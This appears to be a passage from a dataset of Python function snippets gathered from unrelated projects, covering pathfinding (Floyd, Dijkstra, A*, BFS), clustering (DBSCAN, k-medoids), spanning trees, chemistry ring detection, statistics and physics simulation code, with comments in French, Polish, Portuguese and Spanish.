coord.Latitude(5*u.deg)\n Nx = len(xloc)\n \n for i in range(Nx):\n plt.text(xloc[i].wrap_at(wangle).rad, yloc.rad, '{:.0f}$\\degree$'.format((xloc[i]+l_off).wrap_at(wangle).degree), alpha=0.6, ha='center', va='center')\n \n \n \n plt.tight_layout(h_pad=2)\n plt.savefig('../paper/sky_orbits.pdf')", "def get_shortest_route_floyd(network, start,destination, excludings=[]):\n\n # On récupère la liste des villes\n list_city = network[1].keys()\n \n # Si la ville de départ ou de fin n'existe pas\n if start not in list_city or destination not in list_city:\n return None\n\n # On retire les villes à exclure\n list_city = [x for x in list_city if x not in excludings]\n\n\n # Initialisation de se qu'on a besoin\n matrix = []\n distance = []\n n = len(list_city)\n\n \n # On construit la matrice adjacente où indique la distance si il existe une autoroute entre 2 villes\n for x in range(n): \n matrix.append( [] )\n distance.append( [] )\n for y in range(n):\n road_id = get_road_to(network,list_city[x],list_city[y])\n if road_id != None:\n matrix[x].append( get_length(network,road_id) )\n else:\n matrix[x].append( None )\n distance[x].append( [road_id] ) # Autoroute -> format: ['LA']\n\n\t \n # Algorithme de Floyd\n for k in range(n):\n for i in range(n):\n for j in range(n):\n if ( matrix[i][k] != None and matrix[k][j] != None ) and ( ( matrix[i][j] == None ) or ( matrix[i][j] > matrix[i][k] + matrix[k][j] ) ):\n matrix[i][j] = matrix[i][k] + matrix[k][j]\n\t\t \n\t\t # Hors Floyd / Ajout personnel\n if i != k and j != k: # Si i == k ou j == k, cela veut dire qu'on additionne un résultat supplémentaire à la case ij\n distance[i][j] = [] # Sinon ca signifie qu'on a trouvé un chemin plus court, du coup on supprime l'ancien chemin\n distance[i][j].extend( distance[i][k] ) # Chemin d'autoroute parcouru en plus -> format: ['LA','AH']\n distance[i][j].extend( distance[k][j] ) # Chemin d'autoroute parcouru en plus -> format: ['LA','AH']\n\n\t\t \n # On récupère simplement la liste des autoroutes parcourus\n idx_start = list_city.index( start )\n idx_destination = list_city.index( destination )\n distance_minimum = distance[ idx_start ][ idx_destination ]\n\n \n # Si on ne trouve aucune solution, on renvoie None\n if distance_minimum == [None]:\n distance_minimum = None\n \n return distance_minimum", "def DBSCAN(M, eps, min_points):\n colors = ['r', 'g', 'b', 'y', 'c', 'm'] # tablica kolorow - inny kolor dla kazdego clustera\n checked = np.zeros(M.shape[\n 0]) # tablica sprawdzonych punktow wypelniona zerami jesli punkt zostal sprawdzony zmieniana jest wartosc na 1print(checked)\n classification = np.empty(M.shape[0])\n classification.fill(0)\n cluster_count = 0\n for i in range(0, len(colors)): # for odpowiedzialny do tworzenia clusterow (kazdy cluster inny kolor)\n for j in range(0, len(checked)): # szukanie pierwszego niesprawdzonego punktu\n if checked[j] != 1:\n seeds = cluster(M, j, eps)\n startpoint = j\n if min_points > len(seeds):\n checked[\n startpoint] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i nic z nim dalej nie robi bo jest do dupy\n\n if min_points <= len(seeds):\n plt.plot(M[startpoint, 0], M[startpoint, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[startpoint] = 1\n classification[startpoint] = i + 1\n break # jesli znaleziono niesprawdzony punkt wychodzi z petli\n while len(seeds) > 0:\n\n point = seeds[0] # wybranie za kolejny punkt pierwszego punktu z tablicy seeds\n results = cluster(M, point, eps) # zapisanie punktow ktore spelniaja warunek z neighborhood\n if checked[point] != 1:\n if min_points > len(results) and (classification[point] == 0 or classification[point] == -1):\n checked[\n point] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i ustala go jako border\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=8)\n classification[point] = -(i + 1)\n if min_points <= len(results):\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[point] = 1\n classification[point] = i + 1\n for k in range(0, len(results)):\n result_point = results[k]\n seeds.append(\n result_point) # dodanie do tablicy seeds punktow ktore znajdowaly sie w sasiedztwie punktu point\n seeds.remove(seeds[0]) # usuwa juz sprawdzony element z tablicy seeds\n if np.sum(checked) == M.shape[\n 0]: # jesli juz wszystkie punkty zostaly sprawdzone to wychodzi z petli - po tym wszystkie clustery powinny byc zrobione\n break\n return plt.show()", "def find(Map, PosI, PosF):\n \n # Pour les tests, cf. Pathfinding et Pathfinding2 \n \n InitialPosI = PosI\n InitialPosF = PosF\n Chemin = []\n \n Hvalue = np.zeros((np.shape(Map))) #Distance\n Gvalue = np.zeros((np.shape(Map))) #Movement Cost\n Fvalue = np.zeros((np.shape(Map))) #G+H \n Gvalue[:] = np.nan #initialiser Gvalue à une matrice NaN\n \n OpenList = [(InitialPosI,'N')]\n CloseList = []\n \n # Initialisation de Hvalue\n for i in range(np.shape(Hvalue)[0]):\n for j in range(np.shape(Hvalue)[1]):\n if Map[i,j] !=1:\n Hvalue[i,j] = abs(i-PosF[0]) + abs(j-PosF[1])\n else:\n Hvalue[i,j] = np.nan\n\n### Round 1 (+initialisations)\n \n CloseList.append(tuple(PosI))\n \n if PosI[0]-1>=0 and Map[PosI[0]-1,PosI[1]] != 1 and ((PosI[0]-1,PosI[1]) not in OpenList) and ((PosI[0]-1,PosI[1]) not in CloseList): #Check vertical haut\n OpenList.append(((PosI[0]-1,PosI[1]),'D')) #D : fleche vers le bas..\n if PosI[0]+1<=np.shape(Map)[0]-1 and Map[PosI[0]+1,PosI[1]] != 1 and ((PosI[0]+1,PosI[1]) not in OpenList) and ((PosI[0]+1,PosI[1]) not in CloseList): #Check vertical bas\n OpenList.append(((PosI[0]+1,PosI[1]),'U')) \n if PosI[1]-1>=0 and Map[PosI[0],PosI[1]-1] != 1 and ((PosI[0],PosI[1]-1) not in OpenList) and ((PosI[0],PosI[1]-1) not in CloseList): #Check horiz gauche\n OpenList.append(((PosI[0],PosI[1]-1),'R'))\n if PosI[1]+1<=np.shape(Map)[1]-1 and Map[PosI[0],PosI[1]+1] != 1 and ((PosI[0],PosI[1]+1) not in OpenList) and ((PosI[0],PosI[1]+1) not in CloseList): #Check horiz droit\n OpenList.append(((PosI[0],PosI[1]+1),'L'))\n \n \n for OV in OpenList: #OV pour OpenValue \n Gvalue[OV[0][0],OV[0][1]] = 10\n \n Fvalue = np.copy(Gvalue + Hvalue)\n for CV in CloseList: #CV pour ClosedValue\n Fvalue[CV[0],CV[1]] = np.nan\n \n\n#### Round NEXT \n ###Vers le min de Fvalue:\n while PosF not in CloseList and PosI != PosF:\n \n if np.all(np.isnan(Fvalue)): #Check si F est égale à une matrice Full NaN\n# print('Pas de chemin')\n return(False) # soit return False, soit return la position init, donc bon..\n \n Index = np.argwhere(Fvalue == np.nanmin(Fvalue))\n PosI = Index.tolist()[0]\n \n CloseList.append(tuple(PosI))\n if PosI[0]-1>=0 and Map[PosI[0]-1,PosI[1]] != 1 and ((PosI[0]-1,PosI[1]) not in OpenList) and ((PosI[0]-1,PosI[1]) not in CloseList): #Check vertical haut\n OpenList.append(((PosI[0]-1,PosI[1]),'D')) #DOWN (fleche vers le bas..)\n if PosI[0]+1<=np.shape(Map)[0]-1 and Map[PosI[0]+1,PosI[1]] != 1 and ((PosI[0]+1,PosI[1]) not in OpenList) and ((PosI[0]+1,PosI[1]) not in CloseList): #Check vertical bas\n OpenList.append(((PosI[0]+1,PosI[1]),'U')) #Up\n if PosI[1]-1>=0 and Map[PosI[0],PosI[1]-1] != 1 and ((PosI[0],PosI[1]-1) not in OpenList) and ((PosI[0],PosI[1]-1) not in CloseList): #Check horiz gauche\n OpenList.append(((PosI[0],PosI[1]-1),'R')) #Right\n if PosI[1]+1<=np.shape(Map)[1]-1 and Map[PosI[0],PosI[1]+1] != 1 and ((PosI[0],PosI[1]+1) not in OpenList) and ((PosI[0],PosI[1]+1) not in CloseList): #Check horiz droit\n OpenList.append(((PosI[0],PosI[1]+1),'L')) #Left\n \n for OV in OpenList:\n Gvalue[OV[0][0],OV[0][1]] = 10\n \n Fvalue = np.copy(Gvalue + Hvalue)\n for CV in CloseList:\n Fvalue[CV[0],CV[1]] = np.nan\n \n\n \n############## TRACING BACK \n PosF = InitialPosF\n\n while InitialPosI not in Chemin:\n \n for Trace in OpenList:\n if Trace[0] == PosF:\n Chemin.append(PosF)\n if Trace[1] == 'U':\n PosF = (PosF[0]-1,PosF[1]) #Go up\n elif Trace[1] == 'D':\n PosF = (PosF[0]+1,PosF[1]) #Go down\n elif Trace[1] == 'L':\n PosF = (PosF[0],PosF[1]-1) #Go left\n elif Trace[1] == 'R':\n PosF = (PosF[0],PosF[1]+1) #Go right\n# else:\n# print(Chemin)\n Chemin.reverse()\n return(Chemin)", "def _cluster_k_medoids_minibatch(self, num_variants, tolerance, batch_size, cache, max_cycles):\n avail_medoid_indices = [self.index[name] for name in self.tree.get_ordered_names() if name in self.available]\n chsn_indices = [self.index[n] for n in self.chosen]\n num_chsn = len(chsn_indices)\n dists = self._transform_distances(tolerance)\n # This spaces the initial centroids randomly around the tree\n seq_chunk = len(avail_medoid_indices) // (num_variants - num_chsn)\n rand_inds = []\n for i in range(num_variants - num_chsn):\n rand_inds.append(avail_medoid_indices[random.randint(i*seq_chunk, (i+1)*seq_chunk-1)])\n best_med_inds = np.array(chsn_indices + rand_inds)\n # Initial random sets\n best_clusters = self._partition_nearest(best_med_inds, dists)\n best_scores = self._sum_dist_scores(best_med_inds, best_clusters, dists)\n best_score = sum(best_scores)\n # Using a simple greedy algorithm, typically converges after 2-5 iterations.\n num_cycles = 0\n improvement = True\n while improvement == True:\n improvement = False\n med_inds = best_med_inds.copy()\n if len(avail_medoid_indices) > batch_size:\n avail_minibatch_inds = random.sample(avail_medoid_indices, batch_size)\n else:\n avail_minibatch_inds = avail_medoid_indices\n for i in range(num_chsn, num_variants):\n for ind in avail_minibatch_inds:\n if ind in med_inds: continue\n med_inds[i] = ind\n score = self._score_pattern(med_inds, dists)\n if score < best_score:\n best_score = score\n best_med_inds[i] = ind\n improvement = True\n else:\n med_inds[i] = best_med_inds[i]\n num_cycles += 1\n cache['cycles_used'] += 1\n if cache['quit_now'] or max_cycles != None and num_cycles >= max_cycles:\n break\n if cache['quit_now'] or max_cycles != None and num_cycles >= max_cycles:\n improvement = False\n break\n best_clusters = self._partition_nearest(best_med_inds, dists)\n best_scores = self._sum_dist_scores(best_med_inds, best_clusters, dists)\n return best_med_inds, best_scores", "def k_corona(G, k, core_number=None):\n\n def func(v, k, c):\n return c[v] == k and k == sum(1 for w in G[v] if c[w] >= k)\n\n return _core_subgraph(G, func, k, core_number)", "def AGM_prim(mtr_adj, limited_nodes=[], raiz=1):\n\tnum_vertices = len(mtr_adj)\n\n\tfila = []\n\tvertices = [] # ordenados de acordo com a chave\n\t\n\t# adicionando os nodos na lista de vertices e ordenando pela key\n\tfor i in range( 1, num_vertices+1 ):\n\t\tvertices.append( vertice(i) )\n\n\tvertices.sort(key = lambda x: x.key)\n\tlog.debug('vertices: %s' % vertices)\n\t\n\t# fila a ser ordenada pela distancia\n\tfor nodo in vertices:\n\t\tfila.append(nodo)\n\n\t# se a raiz tiver grau máximo =1, seleciona o nodo mais próximo da raiz\n\t# para tornar ele a 'raiz'\n\tverificar_raiz(mtr_adj, limited_nodes, vertices, raiz)\n\t\n\tvertices[raiz-1].dist = 0\n\n\t# ordena a fila por ordem de distancia para o predecessor.\n\treordenar(fila)\n\tlog.debug('fila: %s' % fila)\n\n\t# criando arvore com os nodos que aceitam mais de 1 grau\n\twhile len(fila):\n\t\t# nodo a ser testado\n\t\tu = fila.pop(0)\n\t\t\n\t\t# evitar os nodos com grau máximo = 1 por enquanto\n\t\tif u.key in limited_nodes:\n\t\t\tcontinue\n\t\t\n\n\t\t# passando por todos os outros vértices, e adicionando\n\t\t# para selecionar os nodos que tem o nodo u como predecessor.\n\t\tfor v in range(1, num_vertices+1):\n\t\t\tif u.key != v and \\\n\t\t\tv not in limited_nodes and \\\n\t\t\tmtr_adj[ u.key-1 ][v-1] < vertices[v-1].dist and \\\n\t\t\tna_fila(v, fila):\n\t\t\t\tvertices[v-1].pred = u.key\n\t\t\t\tvertices[v-1].dist = mtr_adj[ u.key-1 ][v-1]\n\t\t\t\treordenar(fila)\n\t\tlog.debug('fila: %s' % fila)\t\n\t\n\t# conectando os nodos que aceitam grau maximo = 1 na arvore\n\tfor u in vertices:\n\t\tif u == raiz:\n\t\t\tcontinue\n\n\t\t# para cada nodo u de grau máximo = 1\n\t\tif u.key in limited_nodes:\n\t\t\t# verificar qual o nodo mais próximo, não limitado, diferente de u\n\t\t\tfor v in range(1, num_vertices+1):\n\t\t\t\tv_dist = mtr_adj[u.key-1][v-1] # distância de u até v\n\t\t\t\tif v != u.key and v_dist < u.dist and v not in limited_nodes:\n\t\t\t\t\tu.dist = v_dist\n\t\t\t\t\tu.pred = v\n\n\treturn vertices", "def _get_ring_nodes(m, namin=3, namax=9, remove_redudant=T):\n # first search for rings\n sets = []\n for i in range(namin, namax+1):\n #if i in [3,4,5]:\n pat_i = '*~1' + '~*'*(i-2) + '~*1'\n #else:\n # pat_i = '*:1' + ':*'*(i-2) + ':*1'\n Qi = Chem.MolFromSmarts( pat_i )\n for tsi in m.GetSubstructMatches(Qi):\n set_i = set(tsi)\n if set_i not in sets:\n sets.append( set(tsi) )\n if remove_redudant:\n # now remove those rings that are union of smaller rings\n n = len(sets)\n sets_remove = []\n ijs = itl.combinations( list(range(n)), 2 )\n sets_u = []\n for i,j in ijs:\n set_ij = sets[i].union( sets[j] )\n if (set_ij in sets) and (set_ij not in sets_remove):\n sets_remove.append( set_ij )\n sets_u = cim.get_compl(sets, sets_remove)\n else:\n sets_u = sets\n return sets_u", "def _rootsFinder(self, fun, jac, bounds, npoints, method):\n if method == \"regular\":\n step = (bounds[1] - bounds[0]) / (npoints + 1)\n try:\n X0 = np.arange(bounds[0] + step, bounds[1], step)\n except:\n X0 = np.random.uniform(bounds[0], bounds[1], npoints)\n elif method == \"random\":\n X0 = np.random.uniform(bounds[0], bounds[1], npoints)\n\n def objFun(X, f, jac):\n g = 0\n j = np.zeros(X.shape)\n i = 0\n for x in X:\n fx = f(x)\n g = g + fx**2\n j[i] = 2 * fx * jac(x)\n i = i + 1\n return g, j\n\n opt = minimize(\n lambda X: objFun(X, fun, jac),\n X0,\n method=\"L-BFGS-B\",\n jac=True,\n bounds=[bounds] * len(X0),\n )\n\n X = opt.x\n np.round(X, decimals=5)\n return np.unique(X)", "def get_kpoints(self,ifwrite='yes'):\n a11 = float(self.lat[2].split()[0])\n a12 = float(self.lat[2].split()[1])\n a13 = float(self.lat[2].split()[2])\n a21 = float(self.lat[3].split()[0])\n a22 = float(self.lat[3].split()[1])\n a23 = float(self.lat[3].split()[2])\n a31 = float(self.lat[4].split()[0])\n a32 = float(self.lat[4].split()[1])\n a33 = float(self.lat[4].split()[2])\n \n x0 = [a11, a12, a13]\n x1 = [a21, a22, a23]\n x2 = [a31, a32, a33]\n \n self.natom = sum(list(map(int,self.lat[6].split())))\n # Number of atoms in POSCAR/CONTCAR\n \n l0 = np.linalg.norm(x0)\n l1 = np.linalg.norm(x1)\n l2 = np.linalg.norm(x2)\n\n self.cell_norm = [l0, l1, l2]\n \n N = (l0*l1*l2*self.kppra/self.natom)**(1.0/3.0)\n \n k0 = int(N/l0)\n k1 = int(N/l1)\n k2 = int(N/l2)\n\n klist = [k0,k1,k2]\n flag = 0\n kn = klist[:]\n\n if len(set(klist)) == 1:\n if (np.prod(np.array(kn))*self.natom) < self.kppra:\n kn = [v+1 for v in kn]\n elif len(set(klist)) == 3:\n while (np.prod(np.array(kn))*self.natom) < self.kppra and flag < 3:\n kn[klist.index(sorted(klist)[flag])] += 1\n flag += 1\n else:\n while (np.prod(np.array(kn))*self.natom) < self.kppra and flag < 2:\n tmp = sorted(set(klist))[flag]\n tmp_ind = []\n for i in range(3):\n if klist[i] == tmp:\n tmp_ind.append(i)\n kn = [kn[i]+1 if i in tmp_ind else kn[i] for i in range(3)]\n flag += 1\n\n self.kps = kn\n \n if (np.prod(np.array(kn))*self.natom) < self.kppra:\n print(\"===== WARNING =====\")\n print(\"K-points generate method may not be appropriate!\")\n print(\"Check source code!!!!\")\n print(\"===================\")\n exit()\n\n #if ifwrite == 'yes':\n # self.write_output()", "def test_for_grader():\n test_map1 = np.array([\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 0, 0, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 0, 0, 0, 1, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1]])\n x_spacing1 = 1\n y_spacing1 = 1\n start1 = np.array([[1.5], [1.5], [0]])\n goal1 = np.array([[7.5], [1], [0]])\n path1 = dijkstras(test_map1,x_spacing1,y_spacing1,start1,goal1)\n s = 0\n for i in range(len(path1)-1):\n s += np.sqrt((path1[i][0]-path1[i+1][0])**2 + (path1[i][1]-path1[i+1][1])**2)\n print(\"Path 1 length:\")\n print(s)\n\n\n test_map2 = np.array([\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1]])\n start2 = np.array([[0.4], [0.4], [1.5707963267948966]])\n goal2 = np.array([[0.4], [1.8], [-1.5707963267948966]])\n x_spacing2 = 0.2\n y_spacing2 = 0.2\n path2 = dijkstras(test_map2,x_spacing2,y_spacing2,start2,goal2)\n s = 0\n for i in range(len(path2)-1):\n s += np.sqrt((path2[i][0]-path2[i+1][0])**2 + (path2[i][1]-path2[i+1][1])**2)\n print(\"Path 2 length:\")\n print(s)", "def get_grid_mappings(weighed_sum,\n use_defaults=True,min_index_row_peaks =40):\n # Detect peaks\n col_peaks = indices_highest_peaks(weighed_sum, 0)\n row_peaks = indices_highest_peaks(weighed_sum, 1)\n \n # Map col_peaks to Hz values\n if len(col_peaks) == len(HZ):\n mapping_Hz = dict(zip(HZ,col_peaks)) \n \n # Map adjusted col_peaks to Hz values\n else:\n try: \n col_peaks =adjust_arr_peaks(weighed_sum,col_peaks,len(HZ),0)\n mapping_Hz = dict(zip(HZ,col_peaks)) \n \n # Map adjusted HZ values to default coordinates if need be\n if use_defaults:\n for i,key in enumerate(HZ):\n if mapping_Hz[key] > UPPER_LIMIT_HZ_COORD[i] or mapping_Hz[key] < LOWER_LIMIT_HZ_COORD[i]:\n mapping_Hz[key] = DEFAULT_HZ_COORD[i]\n except:\n if use_defaults:\n mapping_Hz = dict(zip(HZ,DEFAULT_HZ_COORD )) \n else: \n return np.nan,np.nan,np.nan,np.nan\n \n \n row_peaks = row_peaks[row_peaks > min_index_row_peaks]\n \n try:\n row_100 = row_peaks[0] #Should be around 30 for 100 km\n row_200 = row_peaks[1] #Should be around 30 for 100 km\n except:\n if use_defaults:\n row_100 = KM_DEFAULT_100\n row_200 = KM_DEFAULT_200 \n else: \n return np.nan,np.nan,np.nan,np.nan\n \n if use_defaults:\n if abs(row_100 - KM_DEFAULT_100) > abs(KM_DEFAULT_200 - KM_DEFAULT_100):\n row_100 = KM_DEFAULT_100\n if abs(row_200 - KM_DEFAULT_200) > abs(KM_DEFAULT_200 - KM_DEFAULT_100):\n row_200 = KM_DEFAULT_200 \n \n mapping_km = {100:row_100,200:row_200}\n\n return col_peaks,row_peaks,mapping_Hz, mapping_km", "def aStarSearch(problem, heuristic=nullHeuristic):\r\n\t\"*** YOUR CODE HERE ***\"\r\n\r\n\tfrontera=util.PriorityQueue()\r\n\testadoInicial= problem.getStartState()\r\n\tvisitados=[]\r\n\tnodo = []\r\n\tnodo.append(estadoInicial)\r\n\tnodo.append(0)\r\n\tnodo.append(heuristic(estadoInicial,problem))\r\n\tnodo.append([])\r\n\r\n\tfrontera.push(nodo, nodo[1]+nodo[2])\r\n\r\n\twhile not(frontera.isEmpty()):\r\n\r\n\t\tnodo = frontera.pop()\r\n\t\testado = nodo[0]\r\n\t\tcosto = nodo[1]\r\n\t\tv = nodo[2]\r\n\t\tcamino = nodo[3]\r\n\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tnodoSuc = []\r\n\t\t\t\tnodoSuc.append(sucesor[0])\r\n\t\t\t\tnodoSuc.append(costo + sucesor[2])\r\n\t\t\t\tnodoSuc.append(heuristic(nodoSuc[0], problem))\r\n\t\t\t\tnodoSuc.append(camino + [sucesor[1]])\r\n\r\n\t\t\t\tfrontera.push(nodoSuc, nodoSuc[1]+nodo[2])\r\n\t\t\t\t#frontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Cantidad de nodos en memoria: {}').format(len(frontera.heap))\r\n\treturn camino\r\n\r\n\t#util.raiseNotDefined()\r", "def solution(n, m, r, c, k) -> int:\n xs = []\n # Add all the non-zero room widths to xs\n last_column_wall = None\n for col in c:\n if last_column_wall is not None and col - last_column_wall - 1 > 0:\n xs.append(col - last_column_wall - 1)\n last_column_wall = col\n ys = []\n # Add all the non-zero room heights to ys\n last_row_wall = None\n for row in r:\n if last_row_wall is not None and row - last_row_wall - 1 > 0:\n ys.append(row - last_row_wall - 1)\n last_row_wall = row\n return aux(xs, ys, k)", "def draw_min_span_tree(self):\n\t\tself.graph.draw()\n\n\t\tmin_span_tree = self.kruskal_solve()\n\t\tmin_span_tree.draw()", "def kruskal_wallis(data):\r\n # record number of groups for comparison\r\n num_groups = len(data)\r\n x = hstack(data)\r\n # calculate searchsorted right and searchsroted left indices.\r\n ssl, ssr, sx = ssl_ssr_sx(x)\r\n # calculate H\r\n start = 0\r\n stop = 0\r\n tot = 0\r\n for group in data:\r\n stop += len(group)\r\n # To average the ranks for tied entries we compute leftmost rank of\r\n # value i, minus rightmost rank of value i (and divide by 2). Since\r\n # python indexes to 0, ssl ranks are 1 lower than they shoud be (i.e.\r\n # the smallest value has rank 0 instead of 1). The +1 below corrects for\r\n # this and .5 averages.\r\n ranks = (ssr[start:stop] + ssl[start:stop] + 1) * .5\r\n tot += (ranks.sum() ** 2) / float(len(group))\r\n start += len(group)\r\n n = len(x)\r\n a = 12. / (n * (n + 1))\r\n b = -3. * (n + 1)\r\n H = (a * tot + b)\r\n # correct for ties by calulating D\r\n D = tie_correction(sx)\r\n # Because of the way the chisqprob function in pycogent works, if it gets\r\n # H/D = 0/0 it will fail to exit the loop and hang indefintitely.\r\n if D == 0:\r\n return nan, nan\r\n else:\r\n # give chisqprob the kw statistic, degrees of freedom = (num groups -\r\n # 1)\r\n p_value = chisqprob(H / D, num_groups - 1)\r\n return H / D, p_value", "def camino_minimo_bfs(grafo, origen):\n visitados = set()\n padres = {}\n orden = {}\n cola = collections.deque()\n\n visitados.add(origen)\n padres[origen] = None\n orden[origen] = 0\n cola.append(origen)\n\n while cola:\n v = cola.popleft()\n for w in grafo.adyacentes(v):\n if w not in visitados:\n visitados.add(w)\n padres[w] = v\n orden[w] = orden[v] + 1\n cola.append(w)\n\n return orden ,padres", "def calculate_items(ret_o,snaps, min_neigh=4, cutoff=1.5, MAXnb=100,\n nbins=2000, nbinsq=50, Pe=10, rho_0=0.60,\n spatial_correlation_flag = True,\n cluster_flag = False, CG_flag = True):\n\n ts = len(snaps)\n \n for t1 in range(0,ts):\n\n snap1 = snaps[t1]\n print(t1,ts)\n # for each snapshot in the dump file data\n\n box=snap1['box']\n ref_coords = snap1['ucoords']\n mus = snap1['mus']\n\n # compute (normalized) mean polarisation\n polarisation = np.linalg.norm(np.mean(mus,axis=0))\n\n p6re = np.mean(snap1['c_psi6[1]'])\n p6im = np.mean(snap1['c_psi6[2]'])\n p6 = np.absolute(np.complex(p6re, p6im))\n\n mux = np.mean(snap1['mux'])\n mux2 = np.mean(np.array(snap1['mux'])**2)\n muy = np.mean(snap1['muy'])\n muy2 = np.mean(np.array(snap1['muy'])**2)\n \n theta_Ns = np.arctan2(snap1['muy'], snap1['mux'])\n theta = np.mean(theta_Ns)\n theta2 = np.mean(theta_Ns**2)\n \n nematic_Ns = (2.*np.cos(theta)**2 - 1.)\n nematic = np.mean(nematic_Ns)\n nematic2 = np.mean(nematic_Ns**2)\n \n # compute time averages\n ret_o['g_cnt'] = ret_o.get('g_cnt',0) + 1\n ret_o['sum_psi6'] = ret_o.get('sum_psi6',0) + p6\n ret_o['sum_psi62'] = ret_o.get('sum_psi62',0) + p6*p6\n ret_o['sum_psi6_re'] = ret_o.get('sum_psi6_re',0) + p6re\n ret_o['sum_psi6_im'] = ret_o.get('sum_psi6_im',0) + p6im\n ret_o['sum_mux'] = ret_o.get('sum_mux',0) + mux\n ret_o['sum_mux2'] = ret_o.get('sum_mux2',0) + mux2\n ret_o['sum_muy'] = ret_o.get('sum_muy',0) + muy\n ret_o['sum_muy2'] = ret_o.get('sum_muy2',0) + muy2\n\n \n ret_o['sum_theta'] = ret_o.get('sum_theta',0) + theta\n ret_o['sum_theta2'] = ret_o.get('sum_theta2',0) + theta2\n\n\n ret_o['sum_nematic'] = ret_o.get('sum_nematic',0) + nematic\n ret_o['sum_nematic2'] = ret_o.get('sum_nematic2',0) + nematic2\n ret_o['polarisation'] = ret_o.get('polarisation',0) + polarisation\n\n \n if spatial_correlation_flag:\n \n tmp_list = spatial_correlations(t1,snap1, ret_o,min_neigh=4,\n cutoff=1.5,MAXnb=100,nbins=2000,\n nbinsq=50,Pe=10, rho_0=0.60)\n\n # distance matrix between particle pairs\n ref_distance, ref_dis_x, ref_dis_y = tmp_list[:3]\n # number of neighbours for all particles\n ref_num_nb, ref_list_nb = tmp_list[3:5]\n \n # correlation functions and structure functions\n g, g6, g6re, g6im, sq = tmp_list[5:10]\n g_ori, g_dp, g_dp_tr, g_pr, s_pr = tmp_list[10:]\n\n\n # compute time averages\n\n g_mat = np.matrix(g)\n g6_mat = np.matrix(g6)\n g6re_mat = np.matrix(g6re)\n g6im_mat = np.matrix(g6im)\n sq_mat = np.array(sq)\n\n ret_o['sum_g'] = ret_o.get('sum_g',0*g_mat)+g_mat\n ret_o['sum_g6'] = ret_o.get('sum_g6',0*g6_mat)+g6_mat\n ret_o['sum_g6re'] = ret_o.get('sum_g6re',0*g6re_mat)+g6re_mat \n ret_o['sum_g6im'] = ret_o.get('sum_g6im',0*g6im_mat)+g6im_mat\n\n ret_o['sum_sq'] = ret_o.get('sum_sq',0*sq_mat)+sq_mat\n\n g_ori_mat = np.array(g_ori)\n g_dp_mat = np.array(g_dp)\n g_dp_tr_mat = np.array(g_dp_tr)\n g_pr_mat = np.array(g_pr)\n pij_rij_mat = s_pr\n\n\n ret_o['sum_g_ori'] = (ret_o.get('sum_g_ori',0*g_ori_mat)\n + g_ori_mat)\n ret_o['sum_g_dp'] = (ret_o.get('sum_g_dp',0*g_dp_mat)\n + g_dp_mat)\n ret_o['sum_g_dp_tr'] = (ret_o.get('sum_g_dp_tr',0*g_dp_tr_mat)\n +g_dp_tr_mat)\n ret_o['sum_g_pr'] = (ret_o.get('sum_g_pr',0*g_pr_mat)\n +g_pr_mat)\n ret_o['sum_pij_rij'] = (ret_o.get('sum_pij_rij',0*pij_rij_mat)\n + pij_rij_mat)\n\n\n\n \n if cluster_flag:\n\n tmp_list = cluster_momenta(t1,snap1,\n min_cluster_size=min_cluster_size,\n CG_flag=CG_flag)\n\n RMS_AngMom,RMS_AngMom2 = tmp_list[:2]\n RMS_LinMom,RMS_LinMom2,cluster_size = tmp_list[2:]\n\n\n # beginning of time averages\n\n ret_o['sum_RMS_AngMom'] = (ret_o.get('sum_RMS_AngMom',0)\n + RMS_AngMom)\n ret_o['sum_RMS_AngMom2'] = (ret_o.get('sum_RMS_AngMom2',0)\n + RMS_AngMom2)\n ret_o['sum_RMS_LinMom'] = (ret_o.get('sum_RMS_LinMom',0)\n + RMS_LinMom)\n ret_o['sum_RMS_LinMom2'] = (ret_o.get('sum_RMS_LinMom2',0)\n + RMS_LinMom2)\n ret_o['sum_cluster_size'] = (ret_o.get('sum_cluster_size',0)\n +cluster_size)\n\n\n return ret_o", "def get_rings(phar):\n\n if not isinstance(phar, Pharmacophore):\n raise TypeError(\"Expected Pharmacophore, got %s instead\" %\n type(phar).__name__)\n\n def dfs_backedge(p, n, to_check=None, visited=None, spanning_tree=None):\n\n cycles = []\n if visited is None:\n visited = []\n\n if to_check is None:\n to_check = set(range(p.numnodes))\n\n if spanning_tree is None:\n spanning_tree = {n: None}\n\n tmp = list(to_check)\n\n for v in tmp:\n if v in np.where(p.edges[n] > 0.0)[0]:\n if v not in visited:\n visited.append(v)\n to_check.remove(v)\n spanning_tree[v] = n\n cycles += dfs_backedge(p, v, to_check, visited,\n spanning_tree)\n elif spanning_tree[n] != v:\n w = n\n 